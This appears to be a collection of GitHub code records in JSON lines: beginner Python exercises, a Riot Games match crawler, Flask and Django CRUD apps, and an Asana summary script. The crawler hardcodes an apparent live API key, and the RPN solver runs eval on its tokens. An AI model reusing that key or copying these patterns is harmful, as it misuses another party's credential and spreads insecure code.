given interval\r\nlower = int(input(\"Enter the lower range: \"))\r\nupper = int(input(\"Enter the upper range: \"))\r\nfor n in range(lower,upper+1):\r\n if(n > 1):\r\n for i in range(2,n):\r\n if(n % i) == 0:\r\n break\r\n else:\r\n print(n)\r\n#now to check a given number is prime or not\r\na= int(input(\"Enter a number: \"))\r\nj=1\r\nif(a > 1):\r\n for j in range(2,a):\r\n if(a % j) == 0:\r\n print(a,\"is not a prime number\")\r\n break\r\n else:\r\n print(a,\"is prime\")\r\nelse:\r\n print(a,\"is not a prime number\") \r\n","repo_name":"SwastiPatra/Task_0","sub_path":"num5.py","file_name":"num5.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71148684667","text":"\"\"\"\nProblem Statement : Given an array of unsorted numbers and a target number, find a triplet in the array whose sum is as close to the target number as possible, return the sum of the triplet. If there are more than one such triplet, \nreturn the sum of the triplet with the smallest sum.\n\"\"\"\n\nimport math\n\n\"\"\"\nSolution: O(N^2)\n\"\"\"\n\ndef triple_sum_close(arr,target):\n arr.sort() #sort the array\n smallest_difference = math.inf #initiate this to the largest number\n\n for i in range(len(arr)-2): #we are searching in triplets. preventing it from going out of bound\n left_pt = i + 1 #initialize the pointers\n right_pt =len(arr) -1\n\n while (left_pt < right_pt):\n cur_sum = arr[i] + arr[left_pt] + arr[right_pt] #sum of values two pointers \n target_dif = target - cur_sum #calculate the difference from the target \n\n if target_dif == 0: #smallest sum we can get \n return target\n \n if abs(target_dif) < abs(smallest_difference) or (abs(target_dif) == abs(smallest_difference) and target_dif > smallest_difference):\n smallest_difference = target_dif #update the smallest_difference \n\n if target_dif > 0:\n left_pt += 1 # if the target difference is positive, it means we have a smaller cur_sum than target. increment the left pt\n else:\n right_pt -= 1 #otherwise, decrement the right pt \n return target - smallest_difference\n\n\n\narr= [-2, 0, 1, 2]\ntarget=2\n\nresult = triple_sum_close(arr,target)\nprint(result)","repo_name":"Lefie/Coding-Interview","sub_path":"two_pointers/triple_sum_close_to_target.py","file_name":"triple_sum_close_to_target.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24578259876","text":"user_input= input('Please enter your name sir ')\nprint(\"welcome\", user_input)\n\n\nprint(\"Enter hours:\")\n\nhours= input()\n\nprint(\"Enter rate:\")\n\nrate= input()\ntry:\n if int(hours) > 40:\n def pay():\n res= float(hours) * (float(rate) * 1.5)\n return res \n print(\"Pay:\", pay())\n else:\n def pay():\n res= float(hours) * (float(rate) * 1.5)\n return res \n print(\"Pay:\", pay())\n if pay()< 20:\n print(\"bad\")\n print(\"good\")\nexcept:\n print(\"retry sir\")\n\nprint(\"done\")\n\nstr = \"X-DSPAM-Confidence: 0.8475\"\n\ncolon = str.find(\":\")\nprint(colon)\n\n\n\ninfo = str[colon+ 1: ]\n\nprint(float(info))\n\n\n","repo_name":"Abdelwadoud-Boukerma/AB_Python","sub_path":"list/py4e.py","file_name":"py4e.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15551588276","text":"'''\nEvaluate the value of an arithmetic expression in Reverse Polish Notation.\n\nValid operators are +, -, *, and /. Each operand may be an integer or another expression.\n\nNote that division between two integers should truncate toward zero.\n\nIt is guaranteed that the given RPN expression is always valid. That means the expression would always evaluate to a result, and there will not be any division by zero operation.\n\n \n\nExample 1:\nInput: tokens = [\"2\",\"1\",\"+\",\"3\",\"*\"]\nOutput: 9\nExplanation: ((2 + 1) * 3) = 9\n\nExample 2:\nInput: tokens = [\"4\",\"13\",\"5\",\"/\",\"+\"]\nOutput: 6\nExplanation: (4 + (13 / 5)) = 6\n\nExample 3:\nInput: tokens = [\"10\",\"6\",\"9\",\"3\",\"+\",\"-11\",\"*\",\"/\",\"*\",\"17\",\"+\",\"5\",\"+\"]\nOutput: 22\nExplanation: ((10 * (6 / ((9 + 3) * -11))) + 17) + 5\n= ((10 * (6 / (12 * -11))) + 17) + 5\n= ((10 * (6 / -132)) + 17) + 5\n= ((10 * 0) + 17) + 5\n= (0 + 17) + 5\n= 17 + 5\n= 22\n'''\n\nclass Solution(object):\n def evalRPN(self, tokens):\n operators = ['+', '-', '*', '/']\n result = []\n for token in tokens:\n if token not in operators:\n result.append(token)\n else:\n b = result.pop() \n a = result.pop()\n if int(a) * int(b) < 0 and token == '/' and int(a) % int(b) != 0:\n result.append(str(eval(a + token + b) + 1))\n else:\n result.append(str(eval(a + token + b)))\n return int(result[0])\n \n","repo_name":"ojhaanshu87/LeetCode","sub_path":"150_reverse_polish_notation.py","file_name":"150_reverse_polish_notation.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"34651236453","text":"import requests\nimport time\nimport json\n\nclass GameResultCrawler():\n def __init__(self, name):\n self.dataset = list()\n self.apiKey = \"RGAPI-27f494d3-1248-4d0c-a7f6-3c64b4e3ac4d\"\n self.myName = name.replace(' ', '-')\n self.headers = {\n \"Origin\": \"https://developer.riotgames.com\",\n \"Accept-Charset\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"X-Riot-Token\": self.apiKey,\n \"Accept-Language\": \"ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"\n }\n URL_id = \"https://kr.api.riotgames.com/lol/summoner/v4/summoners/by-name/{}\".format(name)\n res_id = requests.get(URL_id, headers=self.headers)\n self.accountId = res_id.json()['accountId']\n\n def crawlMatchlists(self, counter, season, queue=420): # queue=420 for Rank game\n URL_matchlists = \"https://kr.api.riotgames.com/lol/match/v4/matchlists/by-account/{0}?queue={1}&season={2}&endIndex={3}&beginIndex={4}\".format(self.accountId, queue, season, (counter+1)*100+1, counter*100+1)\n res_matchlists = requests.get(URL_matchlists, headers=self.headers)\n \n matchlist = [mtc[\"gameId\"] for mtc in res_matchlists.json()[\"matches\"]]\n\n return matchlist\n\n def crawlMatch(self, match):\n URL_match = \"https://kr.api.riotgames.com/lol/match/v4/matches/{}\".format(match)\n res_match = requests.get(URL_match, headers=self.headers)\n data = res_match.json()\n\n if res_match.status_code == 429:\n print(\"pending\")\n time.sleep(int(res_match.headers['Retry-After']))\n\n res_match = requests.get(URL_match, headers=self.headers)\n data = res_match.json()\n\n myPick = None # id to identify myPick in match\n\n participantIdentities = data['participantIdentities']\n result = None # win = 1\n for pi in participantIdentities:\n if pi['player']['accountId'] == self.accountId:\n myPick = pi['participantId']\n if pi['participantId'] <= 5:\n if data['teams'][0]['win'] == 'Win': result = 1\n else: result = 0\n else:\n if data['teams'][1]['win'] == 'Win': result = 1\n else: result = 0\n\n participants = data['participants']\n champions = list()\n for ptc in participants:\n champions.append(ptc['championId'])\n\n # [picks1~10], result, myPick\n dataset = list()\n dataset.extend(champions)\n dataset.append(result)\n dataset.append(myPick)\n\n \n return dataset\n\n def main_crawler(self, exist_matchlist=False):\n season = 13\n matchlist = list()\n dataset = list()\n\n if exist_matchlist:\n m = open('./history/matchlist_{}.json'.format(self.myName), 'r')\n matchlist = json.load(m)\n else:\n list_counter = 0 # matchlist counter\n try:\n print(\"Collecting Matchlist\")\n while True: \n matchlist.extend(crawler.crawlMatchlists(list_counter, season))\n list_counter += 1\n except Exception as e:\n print(e)\n finally:\n print(\"Complete collecting Matchlist\")\n with open('./history/matchlist_{}.json'.format(self.myName), 'w') as mt:\n json.dump(matchlist, mt, indent=4)\n\n try:\n print(\"Collecting Match results\")\n for match in matchlist:\n try:\n data = crawler.crawlMatch(match)\n #print(data)\n dataset.append(data)\n except Exception as e:\n print(\"{0} : {1}\".format(match, e))\n except Exception as e:\n print(e)\n finally:\n with open('./history/history_{}.json'.format(self.myName), 'w') as f:\n json.dump(dataset, f, indent=4)\n\n\nif __name__ == \"__main__\":\n crawler = GameResultCrawler('hide on bush')\n crawler.main_crawler(exist_matchlist=True)","repo_name":"laurelwoods0102/LOL-winrate-prediction","sub_path":"mainCrawler.py","file_name":"mainCrawler.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20622550202","text":"# Custom exception to show when a key is not found in the prefix class\n\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass KIDXPrefixNotFound(Exception):\n def __init__(self, key):\n self.key = key\n self.message = _(\"Key %s not found in the prefix class.\") % self.key\n super().__init__(self.message)\n\n\nclass KIDXNotImplementedProperly(Exception):\n def __init__(self):\n self.message = _(\"Prefix class either not found or not implemented.\")\n super().__init__(self.message)\n","repo_name":"khalti/Kidx","sub_path":"kidx/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26039239177","text":"# Same as \"e_interp\" but for u. Is it actually used anywhere?\nimport numpy as np\nfrom scipy.interpolate import CubicSpline\nimport matplotlib.pyplot as plt\n\n\ndef u_interp(u_disc,t_step,t):\n n = len(u_disc)\n print(n)\n ts = np.arange(0.0,float(n),1.0) * t_step\n print(ts)\n u_cont = CubicSpline(ts,u_disc,bc_type='natural')\n\n # Should it be u_cont?\n return u_cont(t)\n","repo_name":"KlickInc/klickhealth-labs-papers-grm-public","sub_path":"src/GlucoseModel/u_interp.py","file_name":"u_interp.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5308487870","text":"txt = input()[:-1]\ncomm, *vals = txt.split()\nvals = ''.join(vals)\nfor val in vals.split(','):\n for i in range(len(val)):\n if val[i] == '[' or val[i] == '&' or val[i] == '*':\n name, left = val[:i], val[i:]\n break\n else:\n name, left = val, ''\n\n reform = ''\n for i in list(left)[::-1]:\n if i == ']':\n reform += '[]'\n elif i == '[':\n continue\n else:\n reform += i\n print(comm + reform + ' ' + name + ';')","repo_name":"louisuss/Algorithms-Code-Upload","sub_path":"Python/Baekjoon/String/3568.py","file_name":"3568.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4197864809","text":"#ToniP\n#INF103\n#celciousToFarenheitTable\n\n#display celsius tepms 0-20\n#F = (9/5 * C) + 32\nC = 0 #counter\n#Display a table\n\nfor C in range(-1,21):\n C += 1\n degree = (9/5 * C) + 32\n print(C, format(degree, '.2f'))\n \n","repo_name":"pradora/Python-Portfolio","sub_path":"02.05.2019_celsiusToFahrenheitTable.py","file_name":"02.05.2019_celsiusToFahrenheitTable.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71875692347","text":"from flask import Flask, request, jsonify, render_template, abort, redirect, url_for\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\nalarmId = 0\n\n# 임시로 데이터를 저장할 리스트\nalarm_data = []\n\n@app.route('/')\ndef main():\n return render_template('main.html', alarm_data=alarm_data)\n\n@app.route('/your-endpoint', methods=['GET', 'POST'])\ndef your_endpoint():\n global alarmId\n\n if request.method == 'GET':\n # GET 방식으로 요청이 들어왔을 \n idValue = alarmId\n nameValue = request.args.get('name')\n timeValue = request.args.get('time')\n\n try:\n # 받은 데이터를 alarm_data에 저장\n data = {\n 'id': idValue,\n 'name': nameValue,\n 'time': timeValue,\n }\n alarm_data.append(data)\n alarmId += 1\n\n response_data = {'result': 'success', 'id': idValue, 'name': nameValue, 'time': timeValue}\n return jsonify(response_data)\n except Exception as e:\n traceback.print_exc() # 오류 메시지 출력\n \n return jsonify({'result': 'error', 'message': str(e)}), 500\n else:\n return jsonify({'result': 'error', 'message': 'Invalid request method.'}), 400\n\n@app.route('/read')\ndef read():\n return render_template('read.html', alarm_data=alarm_data)\n\nif __name__ == '__main__':\n app.run()\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n","repo_name":"jueunkorstd/homenetwork","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29284387975","text":"\"\"\"komentor URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom .views import create_comment, create_document, new_document, show_document, show_documents\n\nurlpatterns = [\n url(r'^$', show_documents),\n url(r'^admin/', admin.site.urls),\n url(r'^create-comment/(.*)', create_comment, name=\"create_comment\"),\n url(r'^create-document/', create_document, name='create_document'),\n url(r'^document/(.*)', show_document, name='document'),\n url(r'^document-creation/', new_document, name=\"document_creation\"),\n url(r'^documents/', show_documents, name='documents_list'),\n]\n","repo_name":"undead404/komentor","sub_path":"komentor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16537704615","text":"# Python 3.5.2 using Keras with the Tensorflow Backend.\r\n# Created on 12.08.2018, by Huy-Hieu PHAM, Cerema & IRIT, France.\r\n\r\n\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport time\r\nimport timeit\r\nimport json\r\nimport argparse\r\nimport densenet\r\nimport numpy as np\r\nimport keras.backend as K\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport itertools\r\nimport math\r\n\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils import np_utils\r\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Lambda, BatchNormalization\r\nfrom keras.layers.advanced_activations import ELU\r\nfrom keras.layers import Convolution2D, MaxPooling2D, AveragePooling2D, merge\r\nfrom keras.engine import Input, Model\r\nfrom keras.optimizers import SGD\r\nfrom keras.callbacks import Callback, LearningRateScheduler, ModelCheckpoint, EarlyStopping\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n# Load and process data.\r\nnb_classes = 3\r\n\r\n# learning rate schedule\r\ndef step_decay(epoch):\r\n\tinitial_lrate = 3e-4\r\n\tdrop = 0.5\r\n\tepochs_drop = 100.0\r\n\tlrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\r\n\treturn lrate\r\n\r\n# 2539 for training and 2536 for testing.\r\nimg_width, img_height = 32, 32\r\ntrain_data_dir = 'data/tisseo/train' \r\nvalidation_data_dir = 'data/tisseo/validation'\r\nnb_train_samples = 2539\r\nnb_validation_samples = 2536\r\nepochs = 250\r\nbatch_size = 64\r\n\r\nif K.image_data_format() == 'channels_first':\r\n input_shape = (3, img_width, img_height)\r\nelse:\r\n input_shape = (img_width, img_height, 3)\r\n\r\n\r\n # Construct DenseNet architeture.\r\n model = densenet.DenseNet(nb_classes, \r\n input_shape, \t\r\n 40,\t\t\t\t# Depth: int -- how many layers; \"Depth must be 3*N + 4\"\r\n 3,\t\t\t\t# nb_dense_block: int -- number of dense blocks to add to end\r\n 12,\t\t\t\t# growth_rate: int -- number of filters to add\r\n 16,\t\t\t\t# nb_filter: int -- number of filters\r\n dropout_rate=0.2,\r\n weight_decay=0.0001)\t\t\t\t\t\t \r\n\t\t\t\t\t\t\t \r\n\t\t\t\t\t\t\t \r\n# Model output.\r\nmodel.summary()\r\n\r\n# Compile the model.\r\nmodel.compile(optimizer=Adam(lr=0.0003, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),\r\n loss = 'sparse_categorical_crossentropy',\r\n metrics = ['accuracy'])\r\n\t\t\t\t \r\n# learning schedule callback\r\nlrate = LearningRateScheduler(step_decay)\r\ncallbacks_list = [lrate]\r\n\r\n# Data augmentation.\r\ntrain_datagen = ImageDataGenerator(rescale = 1./255)\r\ntest_datagen = ImageDataGenerator(rescale = 1./255)\r\n\r\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\r\n target_size = (img_width, img_height),\r\n batch_size = batch_size,\r\n class_mode = 'sparse')\r\n\r\nvalidation_generator = test_datagen.flow_from_directory(validation_data_dir,\r\n target_size = (img_width, img_height),\r\n batch_size = batch_size,\r\n class_mode = 'sparse')\r\n\r\n\r\n# Fit model.\r\nhistory = model.fit_generator(train_generator,\r\n steps_per_epoch=nb_train_samples // batch_size,\r\n epochs=epochs,\r\n validation_data=validation_generator,\r\n validation_steps=nb_validation_samples // batch_size,\r\n callbacks=callbacks_list,\r\n\t\t\t verbose=2)\r\n\r\n# Saving weight.\r\nmodel.save_weights('DenseNet-40-Tisseo.h5')\r\n\r\n# List all data in history.\r\nprint(history.history.keys())\r\n\r\n# grab the history object dictionary\r\nH = history.history\r\n\r\nlast_test_acc = history.history['val_acc'][-1] * 100\r\nlast_train_loss = history.history['loss'][-1] \r\nlast_test_acc = round(last_test_acc, 2)\r\nlast_train_loss = round(last_train_loss, 6)\r\ntrain_loss = 'Training Loss, min = ' + str(last_train_loss)\r\ntest_acc = 'Test Accuracy, max = ' + str(last_test_acc) +' (%)'\r\n \r\n# plot the training loss and accuracy\r\nN = np.arange(0, len(H[\"loss\"]))\r\nplt.style.use(\"ggplot\")\r\nplt.figure()\r\naxes = plt.gca()\r\naxes.set_ylim([0.0,1.2])\r\nplt.plot(N, H['loss'],linewidth=2.5,label=train_loss,color='blue')\r\nplt.plot(N, H['val_acc'],linewidth=2.5, label=test_acc,color='red')\r\n#plt.plot(N, H['val_loss'],linewidth=2.5,label=\"Test Loss\")\r\n#plt.plot(N, H['acc'],linewidth=2.5, label=\"Training Accuracy\")\r\nplt.title('Enhanced-SPMF DenseNet-40 on Tisséo',fontsize=12, fontweight='bold',color = 'Gray')\r\nplt.xlabel('Number of Epochs',fontsize=11, fontweight='bold',color = 'Gray')\r\nplt.ylabel('Training Loss and Test Accuracy',fontsize=12, fontweight='bold',color = 'Gray')\r\nplt.legend()\r\n \r\n# Save the figureL\r\nplt.savefig('output/tisseo/Enhanced-SPMF-DenseNet-40-Tisseo-Cerema.png')\r\nplt.show()\r\n","repo_name":"huyhieupham/DenseNet-Action-Recognition-with-Enhanced-SPMFs","sub_path":"DenseNet-Tisseo-Cerema-Dataset.py","file_name":"DenseNet-Tisseo-Cerema-Dataset.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"74362942909","text":"#analyse and process each clip\n#pipeline: https://www.draw.io/?state=%7B%22ids%22:%5B%221jtC9XGqnJuqxOkcRz7jqPCOd6H2ZsXp3%22%5D,%22action%22:%22open%22,%22userId%22:%22115019067398552559764%22%7D#G1jtC9XGqnJuqxOkcRz7jqPCOd6H2ZsXp3\n\nimport video_face_recognition\nimport face_recognition\nimport os\nimport face_recognition_models\nimport dlib\nimport cv2\nimport time\nimport pickle\n\nFILM_NAME = \"captain_america\"\nOUTPUT_DIR = \"../results/round_2/\" + FILM_NAME + \"/\"\nif not os.path.exists(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n\n# GET QUERY\n\nEXPERIMENT_DIR = \"./\"\nFILM_DATA_DIR = \"../data/round1_symlink/\" + FILM_NAME + \"/\"\nVIDEO_DIR = FILM_DATA_DIR + \"video_clips/\"\nFACES_DIR = FILM_DATA_DIR + \"faces/manual_poor/\"\nSCENES = [\"scene_0\",\"scene_1\",\"scene_2\",\"scene_3\",\"scene_4\"]\n\ndef get_div_dir(scene_number):\n return VIDEO_DIR + SCENES[scene_number] + '/'\n\n# actor_kb structure: {\"actor_name\" : {\"character_name\":\"\", \"image_path\":\"\"}}\nactor_kb = {}\n#name_mappings = {\"channing_tatum\":\"jenko\", \"jonah_hill\":\"schmidt\", \"brie_larson\" : \"molly_tracey\", \"dave_franco\":\"eric_molson\"}\nname_mappings = {\"chris_evans\":\"steve_rogers\",\"hayley_atwell\":\"peggy_carter\",\"sebastian_stan\":\"james_buchanan_barnes\",\"tommy_lee_jones\":\"col_chester_phillips\"}\n# CREATE KNOWLEDGE BASE OF ACTORS & REFERENCE IMAGE PATHS & CHARACTERS RELEVANT TO QUERY\nfor name in name_mappings:\n actor_kb[name] = dict({\"character\":\"\",\"image_path\":\"\"})\n actor_kb[name][\"character\"] = name_mappings[name]\n if os.path.exists(FACES_DIR + name + \".jpg\"):\n actor_kb[name][\"image_path\"] = FACES_DIR + name + \".jpg\"\n else:\n for filename in os.listdir(FACES_DIR):\n parts = filename.split('.')\n if parts[0] == name:\n actor_kb[name][\"image_path\"] = FACES_DIR + name + parts[1]\n break\n else:\n print(\"\\tWarning: couldn't find reference image for \" + name)\n del actor_kb[name]\n\nprint(\"\\n\\nTried to create KB for actors, please verify:\")\nfor key, data in actor_kb.items():\n print(\"\\t{}:{}\".format(key,data))\n\ninput(\"continue?\")\n\n# TODO: CHECK THAT WE CAN ACCESS VIDEOS\nprint(\"Checking that we can access video paths\")\nfor i, scene in enumerate(SCENES):\n print(\"\\n\\tTesting for scene \" + str(i))\n count = 0\n for vid_path in os.listdir(get_div_dir(i)):\n if os.path.exists(get_div_dir(i) + vid_path):\n count += 1\n print(\"\\tgot path \" + get_div_dir(i) + vid_path)\n else:\n print(\"\\tcouldn't find path \" + get_div_dir(i) + vid_path)\n print(\"\\tFound {} paths\".format(count))\n input(\"continue?\")\n\n# USING QUERY, THE VIDEO IS SPLIT INTO DIVISIONS, EACH DIVISION GETS A PERCENTAGE\n# FOR DIVISION IN SCENE, RECOGNIZE FACES IN SELECTED DIVISION\nfor i, scene in enumerate(SCENES):\n # Initialize output stuff for this scene\n # Result format: list of percentages, for each actor in query. Element (percentage) is added for each division searched. \n if not os.path.exists(OUTPUT_DIR + scene):\n os.makedirs(OUTPUT_DIR + scene)\n #print(\"trying to make output dir for scene {}\".format(i))\n #input(\"continue?\")\n results = {}\n for name in name_mappings:\n results[name] = []\n #print(\"Initialized results: \\n\\t{}\".format(results))\n #input(\"Continue?\")\n\n start_time = time.time()\n div_dir = get_div_dir(i)\n for j, video_path in enumerate(os.listdir(div_dir)):\n print(\"vid path : \" + video_path)\n if video_path[0] == '.':\n continue\n # From this video division, get the percentage for each actor\n #print(\"iterating through videos. Video {}, vid path {}, div_dir {}\".format(j, video_path, div_dir))\n info = video_face_recognition.getPercentages(div_dir + video_path, actor_kb, 3)\n percentages = info[0]\n for name, percentage in percentages.items():\n results[name].append(percentage) \n stop_time = time.time()\n if os.path.exists(OUTPUT_DIR):\n dir = OUTPUT_DIR + scene + \"/\" \n else:\n print(\"Couldn't find output directory for scene_{}\".format(i))\n dir = OUTPUT_DIR\n out = open(dir + FILM_NAME + '_' + scene + \"_results.csv\", 'w')\n print(\"Writing results for scene {}\".format(i))\n for actor, val in results.items():\n out.write(\"{},{}\\n\".format(actor,val))\n out.write(\"\\nTime to process/sec, {}\".format(stop_time - start_time))\n out.write(\"\\nFrames analysed: {}/{}\".format(info[1], info[2]))\n out.close()\n\n # TODO: COMPILE & PROCESS THE RESULTS INTO TABLE FORMAT\n # I want to DISPLAY results immediately as a histogram\n # And also PICKLE them for later analysis. The pickle should contain metadata about the experiment: Date, time, length of experiment vs length of video, the scene being analysed (eg: 21_jump_street_scene1, 21_jump_street_scene2)\n #pickle(results, i, SCENES[i], getTime, )\n #write a table to a new pickle file\n pickle_storage = {}\n pickle_filename = FILM_NAME + \"_\" + scene + \"_info.pkl\"\n for actor, val in results.items():\n pickle_storage[actor] = val\n #pickle_data = info + tuple(dict({\"time\": (stop_time - start_time), \"film_name\":FILM_NAME, \"scene\":scene}))\n with open(OUTPUT_DIR + scene + \"/\" + pickle_filename, 'w+b') as pfile:\n pickle.dump(pickle_storage, pfile)","repo_name":"danjcosg/Final-Year-Project-prototype","sub_path":"experiment1.py","file_name":"experiment1.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22649163984","text":"from tkinter import Place\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom admin_challan.models import Challan\n\n# Create your views here.\n\n\ndef home(request):\n if request.method == \"POST\":\n name = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n user = authenticate(request, username = name, password = password )\n\n if user is not None:\n login(request, user)\n return redirect(\"dashboard\")\n else:\n messages.success(request, (\"There was an error Logging In, Try Again....\"))\n return redirect('signin')\n\n\n return render(request, \"signin.html\")\n\n\ndef signup(request):\n return render(request, \"signup.html\")\n\n\ndef dashboard(request):\n emp = Challan.objects.all()\n\n context = {\n \"emp\" : emp, \n }\n\n return render(request, \"dashboard.html\", context)\n\ndef add(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n place = request.POST.get('place')\n license = request.POST.get('license')\n challan_num = request.POST.get('challan_num')\n vehicle_type = request.POST.get('vehicle_type')\n created_by = request.POST.get('created_by')\n\n emp = Challan(\n name = name,\n place = place,\n license = license,\n challan_num = challan_num,\n vehicle_type = vehicle_type,\n created_by = created_by\n )\n\n emp.save()\n return redirect(\"dashboard\")\n\n return render(request, \"dashboard.html\")\n\ndef edit(request):\n emp = Challan.objects.all()\n\n context = {\n \"emp\" : emp,\n }\n return redirect(request, \"dashboard.html\", context)\n\ndef update(request, id):\n if request.method == \"POST\":\n name = request.POST.get('name')\n place = request.POST.get('place')\n license = request.POST.get('license')\n challan_num = request.POST.get('challan_num')\n vehicle_type = request.POST.get('vehicle_type')\n created_by = request.POST.get('created_by')\n\n emp = Challan(\n id = id,\n name = name,\n place = place,\n license = license,\n challan_num = challan_num,\n vehicle_type = vehicle_type,\n created_by = created_by\n )\n\n emp.save()\n return redirect(\"dashboard\")\n\n return redirect(request, \"dashboard.html\")\n\n\ndef delete(request, id):\n emp = Challan.objects.filter(id = id)\n context = {\n \"emp\" : emp,\n }\n emp.delete()\n\n return redirect(\"dashboard\")\n\n\n","repo_name":"aarav124/git-github.com-RiyaRanaChhetrii-E-Challan-System","sub_path":"admin_challan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14096448867","text":"import asana\nimport json\nfrom datetime import date\nimport argparse\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\ndef summarize(client, project_id, post_project):\n \"\"\"\n Collect data from project_id, and create a summary task in the post_project.\n \"\"\"\n # Get info on the project\n project = client.projects.get_project(project_id)\n\n # Loop through the tasks, collecting data\n all_tasks = 0\n tasks_completed = 0\n tasks = client.tasks.get_tasks_for_project(project_id, opt_fields=['completed'])\n for task in tasks:\n all_tasks += 1\n if task['completed']:\n tasks_completed += 1\n \n # Make the summary task\n summary_task_fields = {\n 'projects': [post_project],\n 'name': \"{} Summary of \\\"{}\\\"\".format(\n date.today().isoformat(), project['name']),\n 'notes': \"{} tasks\\n{} ({:.0%}) tasks completed\".format(\n all_tasks, tasks_completed, tasks_completed / all_tasks)\n }\n client.tasks.create_task(**summary_task_fields)\n\ndef main():\n \"\"\"\n Parse arguments, authorize user, and summarize each given project.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"project_to_summarize\",\n help=\"project id of project to summarize\")\n parser.add_argument(\"summary_project\",\n help=\"project id of summary project to post to\")\n args = parser.parse_args()\n\n # Use OAuth\n # check if the user has an existing token stored.\n authorized = False\n client = None\n if 'ASANA_CLIENT_ID' in os.environ and 'ASANA_TOKEN' in os.environ:\n # create a client with your OAuth client ID and a previously obtained \n # bearer token\n client = asana.Client.oauth(\n client_id=os.environ['ASANA_CLIENT_ID'],\n token=json.loads(os.environ['ASANA_TOKEN'])\n )\n print(\"authorized=\", client.session.authorized)\n\n # try to get something to see if token has not expired.\n try:\n client.users.get_user('me')\n authorized = True\n except:\n print(\"token expired. please update ASANA_TOKEN\")\n\n # check if the user has the secret\n if not authorized and 'ASANA_CLIENT_ID' in os.environ and 'ASANA_CLIENT_SECRET' in os.environ:\n # create a client with the OAuth credentials:\n client = asana.Client.oauth(\n client_id=os.environ['ASANA_CLIENT_ID'],\n client_secret=os.environ['ASANA_CLIENT_SECRET'],\n # this special redirect URI will prompt the user to copy/paste the code\n # useful for command line scripts and other non-web apps\n redirect_uri='urn:ietf:wg:oauth:2.0:oob'\n )\n\n # get an authorization URL:\n (url, state) = client.session.authorization_url()\n try:\n # in a web app you'd redirect the user to this URL when they take \n # action to login with Asana or connect their account to Asana\n import webbrowser\n webbrowser.open(url)\n except Exception as e:\n print(\"Open the following URL in a browser to authorize:\")\n print(url)\n\n print(\"Copy and paste the returned code from the browser and press enter:\")\n\n code = sys.stdin.readline().strip()\n # exchange the code for a bearer token will fail on incorrect code\n token = client.session.fetch_token(code=code)\n\n print(\"token=\", json.dumps(token))\n\n # normally 